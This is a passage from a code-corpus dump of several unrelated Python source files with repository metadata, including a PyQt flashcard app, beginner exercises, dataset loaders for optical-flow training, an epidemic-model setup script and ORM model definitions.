controller\n\t\tself.initUI()\n\t\t\n\tdef makeFocus(self):\n\t\tself.setFocus()\n\t\tself.grabKeyboard()\n\n\tdef initUI(self):\n\t\tif not self.hasFocus():\n\t\t\tself.makeFocus()\n\t\tself.cardLabel = QtGui.QLabel()\n\t\tcard = QtGui.QLabel('Card')\n\t\tsideLabel = QtGui.QLabel('Front Side')\n\t\tmainLayout = QtGui.QVBoxLayout() \n\n\t\ttopBar = QtGui.QHBoxLayout()\n\t\ttopBar.addWidget(self.cardLabel)\n\t\ttopBar.addWidget(sideLabel)\n\t\tsideLabel.setSizePolicy(QtGui.QSizePolicy.Preferred,QtGui.QSizePolicy.Fixed)\n\t\tmiddleBar = QtGui.QHBoxLayout()\n\t\tself.shownSide = QtGui.QLabel()\n\t\tself.shownSide.setWordWrap(True)\n\t\tself.shownSide.setTextInteractionFlags(QtCore.Qt.TextSelectableByMouse)\n\t\tbigFont = QtGui.QFont(\"Arial\", 20)\n\t\tself.shownSide.setFont(bigFont)\n\t\tmiddleBar.addWidget(self.shownSide)\n\n\t\tself.previousButton = QtGui.QPushButton('Last', self)\n\t\tself.previousButton.clicked.connect(self.previous)\n\t\tflipButton = QtGui.QPushButton('Flip', self)\n\t\tflipButton.clicked.connect(self.flip)\n\t\tself.knownCheckbox = QtGui.QCheckBox('Known', self)\n\t\tself.knownCheckbox.clicked.connect(self.modifyKnown)\n\t\tself.nextButton = QtGui.QPushButton('Next', self)\n\t\tself.nextButton.clicked.connect(self.next)\n\t\tself.copyButton = QtGui.QPushButton('Copy Side', self)\n\t\tself.copyButton.clicked.connect(self.copySide)\n\t\tself.lookupButton = QtGui.QPushButton('Look up Side', self)\n\t\tself.lookupButton.clicked.connect(self.lookup)\n\n\t\tbottomBar = QtGui.QHBoxLayout()\n\t\tbottomBar.addWidget(self.previousButton)\n\t\tbottomBar.addWidget(flipButton)\n\t\tbottomBar.addWidget(self.knownCheckbox)\n\t\tbottomBar.addWidget(self.nextButton)\n\t\tbottomBar.addWidget(self.copyButton)\n\t\tbottomBar.addWidget(self.lookupButton)\n\n\t\tself.definitionBox = QtGui.QLineEdit()\n\t\tself.getDefinitionButton = QtGui.QPushButton('Get Definition', self)\n\t\tself.getDefinitionButton.clicked.connect(self.getDefinition)\n\t\tnaverBar = QtGui.QHBoxLayout()\n\t\tnaverBar.addWidget(self.definitionBox)\n\t\tnaverBar.addWidget(self.getDefinitionButton)\n\n\t\tmainLayout.addLayout(topBar)\n\t\tmainLayout.addLayout(middleBar)\n\t\tmainLayout.addLayout(bottomBar)\n\t\tmainLayout.addLayout(naverBar)\n\t\tself.setLayout(mainLayout)\n\n\t\tself.showCard()\n\t\tself.updateGui()\n\n\tdef flip(self):\n\t\tif(self.showingFront):\n\t\t\tself.shownSide.setText(self.curCard.getBack())\n\t\t\tself.showingFront = False\n\t\telse:\n\t\t\tself.shownSide.setText(self.curCard.getFront())\n\t\t\tself.showingFront = True\n\n\tdef getDefinition(self):\n\t\tfrom crammer.model import koreanUtils\n\t\tword = self.shownSide.text()\n\t\tself.definitionBox.setText(str(koreanUtils.getDefinition(word)))\n\n\tdef next(self):\n\t\tif(self.controller.getCardNumber() + 1 < self.controller.size()):\n\t\t\tself.controller.nextCard()\n\t\t\tself.showCard()\n\t\t\tself.updateGui()\n\t\telse:\n\t\t\tself.releaseKeyboard()\n\t\t\tself.parent.showResults(self.controller)\n\n\tdef previous(self):\n\t\tif(self.controller.getCardNumber() > 0):\n\t\t\tself.controller.previousCard()\n\t\t\tself.showCard()\n\t\t\tself.updateGui()\n\t\telse:\n\t\t\tprint(\"OOPS\")\n\n\tdef showCard(self):\n\t\tself.curCard = self.controller.getCurCard()\n\t\tself.showingFront = True\n\n\tdef copySide(self):\n\t\tclipboard = QtGui.QApplication.clipboard()\n\t\ttext = self.shownSide.text()\n\t\tclipboard.setText(text)\n\n\tdef lookup(self):\n\t\ttext = self.shownSide.text()\n\t\timport webbrowser\n\t\tnaverlink = 'http://endic.naver.com/search.nhn?sLn=en&searchOption=all&query='\n\t\tlink = '%s%s' %(naverlink, text)\n\t\twebbrowser.open(link)\n\n\tdef modifyKnown(self):\n\t\tcardStatus = self.controller.curCardStatus()\n\t\tself.controller.setCardStatus(not cardStatus)\n\t\tself.knownCheckbox.setChecked(self.controller.curCardStatus())\n\n\tdef updateGui(self):\n\t\tself.shownSide.setText(self.curCard.getFront())\n\t\tself.cardLabel.setText(\"Card %s/%s\" %(self.controller.getCardNumber()+1, self.controller.size()))\n\t\tif(self.controller.getCardNumber() == 0):\n\t\t\tself.previousButton.setEnabled(False)\n\t\telse:\n\t\t\tself.previousButton.setEnabled(True)\n\n\t\tif(self.controller.getCardNumber() == self.controller.size()-1):\n\t\t\tself.nextButton.setText(\"To Results!\")\n\t\telse:\n\t\t\tself.nextButton.setText('Next')\n\n\t\tself.knownCheckbox.setChecked(self.controller.curCardStatus())\n\n\tdef keyPressEvent(self, e):\n\t\tif (e.key() == QtCore.Qt.Key_Right):\n\t\t\tself.next()\n\t\telif(e.key() == QtCore.Qt.Key_Left):\n\t\t\tself.previous()\n\t\telif(e.key() == QtCore.Qt.Key_Down or e.key() == QtCore.Qt.Key_Up):\n\t\t\tself.flip()\n\t\telif(e.key() == QtCore.Qt.Key_Space):\n\t\t\tself.modifyKnown()\n\n\tdef numCards(self):\n\t\treturn self.controller.size()\n\nclass ResultsWidget(QtGui.QWidget):\n\t\n\tdef __init__(self, parent, controller):\n\t\tsuper(ResultsWidget, self).__init__(parent)\n\t\tself.parent = parent\n\t\tself.controller = controller\n\t\tself.initUI()\n\t\t\n\tdef initUI(self):\n\t\tif not self.hasFocus():\n\t\t\tself.setFocus()\n\t\t\tself.grabKeyboard()\n\t\tself.knownCards = self.controller.knownCards()\n\t\tself.statusLabel = QtGui.QLabel(\"Try Harder!\")\n\t\tself.knownLabel = QtGui.QLabel('You knew %s/%s cards!' %(self.controller.knownCards(), self.controller.size()))\n\t\tself.keepCheckBox = QtGui.QCheckBox('Keep all known cards', self)\n\t\tmainLayout = QtGui.QVBoxLayout() \n\n\t\tself.restartButton = QtGui.QPushButton('Restart', self)\n\t\tself.restartButton.clicked.connect(self.restart)\n\t\tself.restartAllButton = QtGui.QPushButton('Restart All', self)\n\t\tself.restartAllButton.clicked.connect(self.restartAll)\n\t\tself.endButton = QtGui.QPushButton('End', self)\n\t\tself.endButton.clicked.connect(self.next)\n\n\t\trestartBar = QtGui.QHBoxLayout()\n\t\trestartBar.addWidget(self.restartButton)\n\t\trestartBar.addWidget(self.restartAllButton)\n\n\t\tbottomBar = QtGui.QHBoxLayout()\n\t\tbottomBar.addWidget(self.endButton)\n\n\t\tmainLayout.addWidget(self.statusLabel)\n\t\tmainLayout.addWidget(self.knownLabel)\n\t\tmainLayout.addWidget(self.keepCheckBox)\n\t\tmainLayout.addLayout(restartBar)\n\t\tmainLayout.addLayout(bottomBar)\n\t\tself.setLayout(mainLayout)\n\n\n\tdef flip(self):\n\t\tif(self.showingFront):\n\t\t\tself.shownSide.setText(self.curCard.getBack())\n\t\t\tself.showingFront = False\n\t\telse:\n\t\t\tself.shownSide.setText(self.curCard.getFront())\n\t\t\tself.showingFront = True\n\n\tdef next(self):\n\t\tif(controller.cardNumber + 1 < len(controller.deck)):\n\t\t\tcontroller.nextCard()\n\t\t\tself.showCard()\n\t\t\tself.updateGui()\n\t\telse:\n\t\t\tself.parent.showResults()\n\n\tdef restart(self):\n\t\tnewController = self.controller if self.keepCheckBox.isChecked() else self.controller.newControllerUnknownCards()\n\t\tnewController.restartAll()\n\t\tself.parent.showRestartDeck(newController)\n\n\tdef restartAll(self):\n\t\tself.parent.showRestartAllDeck()\n\n\tdef showCard(self):\n\t\tself.curCard = controller.getCurCard()\n\t\tself.showingFront = True\n\n\tdef keyPressEvent(self, e):\n\t\tif (e.key() == QtCore.Qt.Key_Right):\n\t\t\tself.restart()\n\nclass APIKeyTable(QtGui.QTableWidget):\n\tdef __init__(self, data, *args):\n\t\tQtGui.QTableWidget.__init__(self, *args)\n\t\tself.data = data\n\t\tself.setColumnCount(2)\n\t\theaderLabels = ['API', 'Has Key']\n\t\tself.setHorizontalHeaderLabels(headerLabels)\n\t\tself.verticalHeader().hide()\n\t\tself.setData()\n\t\tself.resizeColumnsToContents()\n\n\tdef setData(self):\n\t\tpass\n\t\t'''\n\t\tself.setRowCount(len(self.data))\n\t\tn = 0\n\t\tfor key in self.data:\n\t\t\tlabelItem = QtGui.QTableWidgetItem(key)\n\t\t\tlabelItem.setFlags(QtCore.Qt.ItemIsSelectable | QtCore.Qt.ItemIsEnabled)\n\t\t\thasKey = self.data[key] != ''\n\t\t\tvalueItem = QtGui.QTableWidgetItem(str(hasKey))\n\t\t\tvalueItem.setFlags(QtCore.Qt.ItemIsSelectable | QtCore.Qt.ItemIsEnabled)\n\t\t\tself.setItem(n, 0, labelItem)\n\t\t\tself.setItem(n, 1, valueItem)\n\t\t\tn += 1\n\t\t'''\n\ndef main(f, cards):\n\t\n\tapp = QtGui.QApplication(sys.argv)\n\tdb = 'decks.db'\n\tex = FlashCardWindow(cardFile = f, preExistingCards = cards)\n\tsys.exit(app.exec_())\n\n","repo_name":"ll2585/reader","sub_path":"crammer/gui/gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":12715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"74217074332","text":"#Sals Shipping\n\ndef print_cheapest_shipping_method(weight):\n print(\"The cheapest option available is $%.2f with %s shipping\")\n\ndef ground_ship(weight):\n if weight >= 10:\n cost = 4.75\n elif weight >= 6:\n cost = 4\n elif weight >= 2:\n cost = 3\n elif weight >= 0:\n cost = 1.50\n total_cost = weight * cost + 20\n print(total_cost)\n return(total_cost) # have the function return the calculated value\n\npremium_ship = 125\n\ndef drone_ship(weight):\n if weight >= 10:\n cost = 14.25\n elif weight >= 6:\n cost = 12\n elif weight >= 2:\n cost = 9\n elif weight >= 0:\n cost = 4.5\n total_cost = weight * cost\n print(total_cost)\n return(total_cost) # have the function return the calculated value\n\nground_ship(10)\ndrone_ship(1.5)\n\ndef best_deal(weight):\n # now you can compare values, by calling each function with the given 'weight'\n if ground_ship(weight) < drone_ship(weight) and ground_ship(weight) < premium_ship:\n method = \"standard ground\"\n cost = ground_ship(weight) # get the cost from the function calculation\n\n elif premium_ship < drone_ship(weight) and premium_ship < ground_ship(weight):\n method = \"premium\"\n cost = premium_ship # in this case, premium_ship is a value\n else:\n method = \"drone\"\n cost = drone_ship(weight) # get the cost from the function calculation\n\n print(\"The cheapest option for your package is \" + method + \" shipping and the cost will be $\" + str(cost))\n\nbest_deal(10)","repo_name":"zahariromanov/Python","sub_path":"Introduction/salsshipping.py","file_name":"salsshipping.py","file_ext":"py","file_size_in_byte":1448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30704508124","text":"from docassemble.base.config import daconfig\n\nbroker_heartbeat = 30\ntask_serializer = 'pickle'\naccept_content = ['pickle']\nresult_serializer = 'pickle'\ntimezone = daconfig.get('timezone', 'America/New_York')\nenable_utc = True\nbroker_connection_retry = True\nbroker_connection_retry_on_startup = True\n\nif daconfig.get('has_celery_single_queue', False):\n task_routes = {\"docassemble.webapp.worker.ocr_page\": {\"queue\": \"single\"}}\nif 'celery processes' in daconfig:\n worker_concurrency = daconfig['celery processes']\n","repo_name":"jhpyle/docassemble","sub_path":"docassemble_webapp/docassemble/webapp/config_worker.py","file_name":"config_worker.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","stars":686,"dataset":"github-code","pt":"32"} +{"seq_id":"72566104090","text":"import os.path\r\nimport glob\r\nfrom .listdataset import ListDataset\r\nfrom datasets.util import split2list\r\nfrom utils import co_flow_and_images_transforms\r\nfrom imageio import imread\r\nfrom .listdataset import load_flo\r\nimport numpy as np\r\nimport cv2\r\nfrom datasets.dataset_split import train_test_split_dir\r\n\r\n\r\n\r\n'''\r\nextracted from https://github.com/ClementPinard/FlowNetPytorch/tree/master/datasets\r\nDataset routines for MPI Sintel.\r\nhttp://sintel.is.tue.mpg.de/\r\nclean version imgs are without shaders, final version imgs are fully rendered\r\nThe datasets is not very big, you might want to only pretrain on it for flownet\r\n'''\r\n\r\n\r\ndef make_dataset(dataset_dir, split, dataset_type='clean'):\r\n flow_dir = 'flow'\r\n assert(os.path.isdir(os.path.join(dataset_dir,flow_dir)))\r\n img_dir = dataset_type\r\n assert(os.path.isdir(os.path.join(dataset_dir,img_dir)))\r\n\r\n images = []\r\n for flow_map in sorted(glob.glob(os.path.join(dataset_dir,flow_dir,'*','*.flo'))):\r\n flow_map = os.path.relpath(flow_map,os.path.join(dataset_dir,flow_dir))\r\n\r\n scene_dir, filename = os.path.split(flow_map)\r\n no_ext_filename = os.path.splitext(filename)[0]\r\n prefix, frame_nb = no_ext_filename.split('_')\r\n frame_nb = int(frame_nb)\r\n img1 = os.path.join(img_dir, scene_dir, '{}_{:04d}.png'.format(prefix, frame_nb + 1))\r\n img2 = os.path.join(img_dir, scene_dir, '{}_{:04d}.png'.format(prefix, frame_nb))\r\n # img2 is target, which corresponds to the first image for sintel\r\n flow_map = os.path.join(flow_dir, flow_map)\r\n if not (os.path.isfile(os.path.join(dataset_dir,img1)) and os.path.isfile(os.path.join(dataset_dir,img2))):\r\n continue\r\n images.append([[img1,img2],flow_map])\r\n\r\n return split2list(images, split, default_split=0.87)\r\n\r\n\r\ndef mpisintel_loader(root, path_imgs, path_flo):\r\n imgs = [os.path.join(root,path) for path in path_imgs]\r\n flo = os.path.join(root,path_flo)\r\n\r\n invalid_mask_dir = 'invalid'\r\n occlusion_mask_dir = 'occlusions'\r\n\r\n scene_dir, filename = os.path.split(path_flo)\r\n flow, scene_dir = os.path.split(scene_dir)\r\n filename = filename[:-4]\r\n\r\n path_invalid_mask = os.path.join(invalid_mask_dir, scene_dir, '{}.png'.format(filename))\r\n invalid_mask = cv2.imread(os.path.join(root, path_invalid_mask), 0).astype(np.uint8)\r\n valid_mask = (invalid_mask == 0)\r\n\r\n # if want to remove occluded regions\r\n path_occlusion_mask = os.path.join(occlusion_mask_dir, scene_dir, '{}.png'.format(filename))\r\n occluded_mask = cv2.imread(os.path.join(root, path_occlusion_mask), 0).astype(np.uint8)\r\n noc_mask = (occluded_mask == 0).astype(np.uint8)\r\n\r\n return [imread(img).astype(np.uint8) for img in imgs], load_flo(flo), valid_mask.astype(np.uint8)\r\n\r\n\r\ndef mpisintel_allpair_loader(root, path_imgs, path_flo):\r\n imgs = [os.path.join(root, path) for path in path_imgs]\r\n flo = os.path.join(root, path_flo)\r\n mask = os.path.join(os.path.dirname(flo), 'occlusion.png')\r\n return [imread(img).astype(np.uint8) for img in imgs], load_flo(flo), 1 - imread(mask).astype(np.float32)/255\r\n\r\n\r\ndef mpi_sintel_clean(root, source_image_transform=None, target_image_transform=None, flow_transform=None,\r\n co_transform=None, split=None):\r\n train_list, test_list = make_dataset(root, split, 'clean')\r\n train_dataset = ListDataset(root, train_list, source_image_transform=source_image_transform,\r\n target_image_transform=target_image_transform,\r\n flow_transform=flow_transform,\r\n co_transform=co_transform, loader=mpisintel_loader, mask=True)\r\n test_dataset = ListDataset(root, test_list, source_image_transform=source_image_transform,\r\n target_image_transform=target_image_transform,\r\n flow_transform=flow_transform,\r\n co_transform=co_transform, loader=mpisintel_loader, mask=True)\r\n return train_dataset, test_dataset\r\n\r\n\r\ndef mpi_sintel_final(root, source_image_transform=None, target_image_transform=None, flow_transform=None,\r\n co_transform=None, split=None):\r\n train_list, test_list = make_dataset(root, split, 'final')\r\n train_dataset = ListDataset(root, train_list, source_image_transform=source_image_transform,\r\n target_image_transform=target_image_transform,\r\n flow_transform=flow_transform,\r\n co_transform=co_transform, loader=mpisintel_loader, mask=True)\r\n test_dataset = ListDataset(root, test_list, source_image_transform=source_image_transform,\r\n target_image_transform=target_image_transform,\r\n flow_transform=flow_transform,\r\n co_transform=co_transform, loader=mpisintel_loader, mask=True)\r\n\r\n return train_dataset, test_dataset\r\n\r\n\r\ndef mpi_sintel_both(root, source_image_transform=None, target_image_transform=None, flow_transform=None,\r\n co_transform=None, test_image_transform=None, split=None):\r\n '''load images from both clean and final folders.\r\n We cannot shuffle input, because it would very likely cause data snooping\r\n for the clean and final frames are not that different'''\r\n #assert(isinstance(split, str)), 'To avoid data snooping, you must provide a static list of train/val when dealing with both clean and final.'\r\n ' Look at Sintel_train_val.txt for an example'\r\n train_list1, test_list1 = make_dataset(root, split, 'clean')\r\n train_list2, test_list2 = make_dataset(root, split, 'final')\r\n train_dataset = ListDataset(root, train_list1 + train_list2, source_image_transform=source_image_transform,\r\n target_image_transform=target_image_transform,\r\n flow_transform=flow_transform,\r\n co_transform=co_transform, loader=mpisintel_loader, mask=True)\r\n if test_image_transform is None:\r\n test_dataset = ListDataset(root, test_list1 + test_list2, source_image_transform=source_image_transform,\r\n target_image_transform=target_image_transform,\r\n flow_transform=flow_transform,\r\n co_transform=co_flow_and_images_transforms.CenterCrop((384, 1024)),\r\n loader=mpisintel_loader, mask=True)\r\n else:\r\n test_dataset = ListDataset(root, test_list1 + test_list2, source_image_transform=test_image_transform,\r\n target_image_transform=test_image_transform,\r\n flow_transform=flow_transform,\r\n co_transform=co_flow_and_images_transforms.CenterCrop((384,1024)),\r\n loader=mpisintel_loader, mask=True)\r\n\r\n return train_dataset, test_dataset\r\n\r\n\r\ndef make_allpair_dataset(dataset_dir, split):\r\n images = []\r\n for sub_root in dataset_dir:\r\n # Make sure that the folders exist\r\n if not os.path.isdir(sub_root):\r\n raise ValueError(\"the training directory path that you indicated does not exist !\")\r\n flow_map = os.path.join(sub_root, 'flow.flo')\r\n source_img = os.path.join(sub_root, 'target.png') # source image\r\n target_img = os.path.join(sub_root, 'source.png') # target image\r\n if not (os.path.isfile(source_img) and os.path.isfile(target_img)):\r\n continue\r\n images.append([[source_img, target_img], flow_map])\r\n\r\n return split2list(images, split, default_split=0.95)\r\n\r\n\r\ndef mpi_sintel_allpair(root, dataset=\"sintel_allpair\", source_image_transform=None, target_image_transform=None, \r\n flow_transform=None, co_transform=None, split=None) :\r\n ''' load images from generated sintel all pair dataset.'''\r\n if not os.path.isdir(root): \r\n raise \"(mip sintel_allpair : Invalid path for \" + os.path.join(root, dataset)\r\n\r\n pair_dirs = []\r\n for scene_list in os.listdir(root): # for scene list e.g) alley_1, ambush_4\r\n grand_parent_dir = os.path.join(os.path.join(root, scene_list))\r\n for start_list in os.listdir(grand_parent_dir): \r\n parent_dir = os.path.join(grand_parent_dir, start_list)\r\n for end_list in os.listdir(parent_dir):\r\n pair_dirs.append(os.path.join(parent_dir, end_list))\r\n\r\n train_list, test_list = make_allpair_dataset(pair_dirs, split) \r\n\r\n root = '.'\r\n train_dataset = ListDataset(root, train_list, source_image_transform=source_image_transform,\r\n target_image_transform=target_image_transform, mask=True,\r\n loader=mpisintel_allpair_loader,\r\n flow_transform=flow_transform, co_transform=co_transform)\r\n test_dataset = ListDataset(root, test_list, source_image_transform=source_image_transform,\r\n target_image_transform=target_image_transform, mask=True,\r\n loader=mpisintel_allpair_loader,\r\n flow_transform=flow_transform, co_transform=co_transform)\r\n\r\n return (train_dataset, test_dataset)\r\n","repo_name":"DanilKim/dense_correspondence","sub_path":"GLU-Net/datasets/mpisintel.py","file_name":"mpisintel.py","file_ext":"py","file_size_in_byte":9395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38025281080","text":"from hashlib import (\n sha256,\n)\nfrom random import (\n randint,\n)\nimport pytest\nimport eth_utils\nfrom .challenges import challenges\n\n\n@pytest.mark.parametrize(\n 'challenge_no,challenge', challenges.items()\n)\ndef test_check_challenge(rsa_bounty_contract,\n w3,\n challenge_no,\n challenge):\n call = rsa_bounty_contract.functions.challenges(challenge_no)\n modulus, redeemed, bounty = call.call()\n assert not redeemed\n assert bounty == challenge[\"bounty\"]\n assert int.from_bytes(modulus, \"big\") == challenge[\"modulus\"]\n\n\ndef test_challenges_length(rsa_bounty_contract,\n w3):\n call = rsa_bounty_contract.functions.challenges_length()\n num = call.call()\n assert num == len(challenges)\n","repo_name":"dankrad/rsa-bounty","sub_path":"tests/test_check_challenges.py","file_name":"test_check_challenges.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"32"} +{"seq_id":"22605856854","text":"from django.db import models\n\nclass Event(models.Model):\n name = models.CharField(max_length=40)\n organizer = models.ForeignKey(\"Coder\", on_delete=models.CASCADE, related_name='organizer')\n number_of_people = models.IntegerField()\n attendees = models.ManyToManyField(\"Coder\", related_name=\"attended_events\")\n description = models.CharField(max_length=150)\n location = models.CharField(max_length=200)\n type = models.ForeignKey(\"Category\", on_delete=models.CASCADE, related_name='type')\n date = models.DateField()\n likers = models.ManyToManyField(\"Coder\", related_name=\"event_coder_liked\")","repo_name":"Jason720r/Our-Code-Server","sub_path":"ourcodeapi/models/event.py","file_name":"event.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"27868812169","text":"'''\nEXERCÍCIOS - AULA 5 - PYTHON BÁSICO - SOLYD TREINAMENTOS\nFaça um programa que leia a quantidade de pessoas que serão convidadas para uma festa.\nApós isso, o porgrama irá perguntar o nome de todas as pessoas e colocar numa lista de convidados.\nApós isso, irá imprimir os nomes da lista\n'''\n\nqtConvidados = int(input('Quantas pessoas serão convidadas? '))\nlista = []\n\nfor i in range(qtConvidados):\n nome = input('Nome do convidado ' + str(i + 1) + ': ')\n lista.append(nome)\n\nprint('\\nLista de Convidados:')\n \nfor i in range(qtConvidados):\n print(lista[i])\n","repo_name":"csalonso/python-solyd-cursos","sub_path":"ex-aula05.py","file_name":"ex-aula05.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"4674090894","text":"import numpy as np\n\nfrom epiforecast.risk_simulator import MasterEquationModelEnsemble\n\nfrom _argparse_init import arguments\nfrom _constants import (start_time,\n community_transmission_rate,\n hospital_transmission_reduction)\nfrom _stochastic_init import transition_rates\nfrom _user_network_init import user_nodes, user_population, user_network, exterior_neighbors\nfrom _network_init import population\n\nfrom _utilities import print_start_of, print_end_of\n\nfrom epiforecast.populations import TransitionRates\nfrom epiforecast.samplers import BetaSampler, GammaSampler\n\n\nprint_start_of(__name__)\n################################################################################\nensemble_size = 100\nn_forward_steps = 1 # minimum amount of steps per time step: forward run\nn_backward_steps = 8 # minimum amount of steps per time step: backward run\n\n# Prior of transition rates ####################################################\nlearn_transition_rates = arguments.params_learn_transition_rates\ntransition_rates_ensemble = []\nif learn_transition_rates == True:\n parameter_str = arguments.params_transition_rates_str.split(',')\n #extract the true rates users, in case we wish to use the true values on the user_network\n transition_rates_for_users = transition_rates[user_nodes]\n user_stochastic_clinical_parameters = transition_rates_for_users.get_clinical_parameters_as_dict()\n for i in range(ensemble_size):\n #transition_rates = TransitionRates.from_samplers(\n # population=user_network.get_node_count(),\n # lp_sampler=GammaSampler(1.7,2.,1.),\n # cip_sampler=GammaSampler(1.5,2.,1.),\n # hip_sampler=GammaSampler(1.5,3.,1.),\n # hf_sampler=BetaSampler(4.,0.036),\n # cmf_sampler=BetaSampler(4.,0.001),\n # hmf_sampler=BetaSampler(4.,0.18)\n #)\n \n transition_rates = TransitionRates.from_samplers(\n population=user_network.get_node_count(),\n lp_sampler=GammaSampler(1.35,2.,1.),\n cip_sampler=GammaSampler(1.1,2.,1.),\n hip_sampler=GammaSampler(1.0,4.,1.),\n hf_sampler=user_stochastic_clinical_parameters['hf'],\n cmf_sampler=user_stochastic_clinical_parameters['cmf'],\n hmf_sampler=user_stochastic_clinical_parameters['hmf']\n )\n \n transition_rates.calculate_from_clinical()\n transition_rates_ensemble.append(transition_rates)\n #transition_rates_particle = transition_rates #[user_nodes]\n #transition_rates_particle.calculate_from_clinical()\n #transition_rates_ensemble.append(transition_rates_particle)\n\nelse:\n parameter_str = None\n for i in range(ensemble_size):\n transition_rates_particle = transition_rates[user_nodes]\n transition_rates_particle.calculate_from_clinical()\n transition_rates_ensemble.append(transition_rates_particle)\n\n# range of transition rates\ntransition_rates_min = {'latent_periods': 2,\n 'community_infection_periods': 1,\n 'hospital_infection_periods': 1,\n 'hospitalization_fraction': 1e-5,\n 'community_mortality_fraction': 0,\n 'hospital_mortality_fraction': 0}\n\ntransition_rates_max = {'latent_periods': 12,\n 'community_infection_periods': 15,\n 'hospital_infection_periods': 10,\n 'hospitalization_fraction': 0.99999,\n 'community_mortality_fraction': 1,\n 'hospital_mortality_fraction': 1}\n\n# Prior of transmission rate ###################################################\ncommunity_transmission_rate_ensemble = np.full([ensemble_size, user_population],\n community_transmission_rate)\n\n\n\n\nlearn_transmission_rate = arguments.params_learn_transmission_rate\nparam_transform=None\ntransmission_rate_bias = arguments.params_transmission_rate_bias \ntransmission_rate_std = arguments.params_transmission_rate_noise * community_transmission_rate\nif learn_transmission_rate == True:\n \n if param_transform == 'log':\n #see wikipedia for transform!\n community_transmission_rate_ensemble = np.random.lognormal(\n np.log(community_transmission_rate**2/np.sqrt(community_transmission_rate**2 + transmission_rate_std**2)),\n np.sqrt(np.log(1 + transmission_rate_std**2/community_transmission_rate**2)),\n community_transmission_rate_ensemble.shape)\n else:\n community_transmission_rate_ensemble = np.random.normal(\n community_transmission_rate+transmission_rate_bias,\n transmission_rate_std,\n community_transmission_rate_ensemble.shape)\n\n# range of transmission rate\ntransmission_rate_min = 1\ntransmission_rate_max = 20\n\n#exogenous rates - neighbor-weighted:\nif arguments.user_network_external_neighbor_type == 'exact':\n exterior_neighbor_weights = exterior_neighbors\nelif arguments.user_network_external_neighbor_type == 'average':\n exterior_neighbor_weights = np.mean(exterior_neighbors)*np.ones(exterior_neighbors.shape)\nelse:\n raise ValueError(\"unknown method, choose from: exact, average\")\n\n# Set up master equation solver ################################################\nmaster_eqn_ensemble = MasterEquationModelEnsemble(\n population=user_population,\n transition_rates=transition_rates_ensemble,\n transmission_rate_parameters=community_transmission_rate_ensemble,\n hospital_transmission_reduction=hospital_transmission_reduction,\n ensemble_size=ensemble_size,\n exterior_neighbors=exterior_neighbor_weights,\n start_time=start_time,\n parallel_cpu=arguments.parallel_flag,\n num_cpus=arguments.parallel_num_cpus,\n ensemble_correction=arguments.ensemble_closure\n)\n\n\n\n# 6 states\nI_slice = slice( 2*user_population, 3*user_population)\nS_slice = slice( 0,user_population)\nensemble_ic = np.zeros([ensemble_size, 6*user_population])\n\n# 5 states\n#I_slice = slice( user_population, 2*user_population)\n#S_slice = slice( 0,user_population)\n#ensemble_ic = np.zeros([ensemble_size, 5*user_population])\n\n\nensemble_ic[:,I_slice] = np.random.beta(arguments.ic_alpha,\n arguments.ic_beta,\n (ensemble_size, user_population))\n# if excluding S category, then this slice is 0 IC\nensemble_ic[:,S_slice] = 1 - ensemble_ic[:,I_slice]\n\n################################################################################\nprint_end_of(__name__)\n\n","repo_name":"tapios/risk-networks","sub_path":"examples/da-sandbox/_master_eqn_init.py","file_name":"_master_eqn_init.py","file_ext":"py","file_size_in_byte":6699,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"16845716900","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n\ndef commonChild(s1, s2):\n\n\n (m, n) = (len(s1), len(s2))\n M = [0 for x in range(m + 2)]\n count=0\n for i in range(1,m+1):\n prev = 0\n for j in range(1,n+1):\n temp = M[j]\n if s1[i-1]==s2[j-1]:\n M[j]=prev+1\n else:\n M[j]=max(M[j],M[j-1])\n prev = temp\n\n return M[n]\n \nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n s1 = input()\n\n s2 = input()\n\n result = commonChild(s1, s2)\n\n fptr.write(str(result) + '\\n')\n\n fptr.close()","repo_name":"HiteshTetarwal/hackerrank","sub_path":"string_manupulation/common_child_strings.py","file_name":"common_child_strings.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25856880467","text":"from typing import TYPE_CHECKING, List\n\nfrom sqlalchemy import BigInteger, ForeignKey\nfrom sqlalchemy.orm import Mapped, mapped_column, relationship\n\nfrom src.db.utils import doc_and_comment\nfrom src.models import Base\nfrom src.models.annotations import bigint_pk\n\nif TYPE_CHECKING:\n from src.models.member import Member\n from src.models.user import User\n\n\nclass Guild(Base):\n \"\"\"Discord guild\"\"\"\n\n __tablename__ = 'guilds'\n __table_args__ = (\n {\n 'comment': __doc__,\n },\n )\n\n id: Mapped[bigint_pk] = mapped_column(\n **doc_and_comment('The guild\\'s unique ID'),\n )\n name: Mapped[str] = mapped_column(\n **doc_and_comment('The guild\\'s name'),\n )\n owner_id: Mapped[int] = mapped_column(\n BigInteger,\n ForeignKey('users.id', ondelete='CASCADE'),\n repr=False,\n )\n owner: Mapped['User'] = relationship(\n back_populates='owner_of',\n lazy='joined',\n innerjoin=True,\n init=False,\n )\n members: Mapped[List['Member']] = relationship(\n back_populates='guild',\n cascade='all, delete-orphan',\n default_factory=list,\n lazy='selectin',\n )\n\n def to_dict(self):\n return {\n 'id': self.id,\n 'name': self.name,\n 'owner_id': self.owner_id,\n 'owner': self.owner,\n 'members': self.members,\n 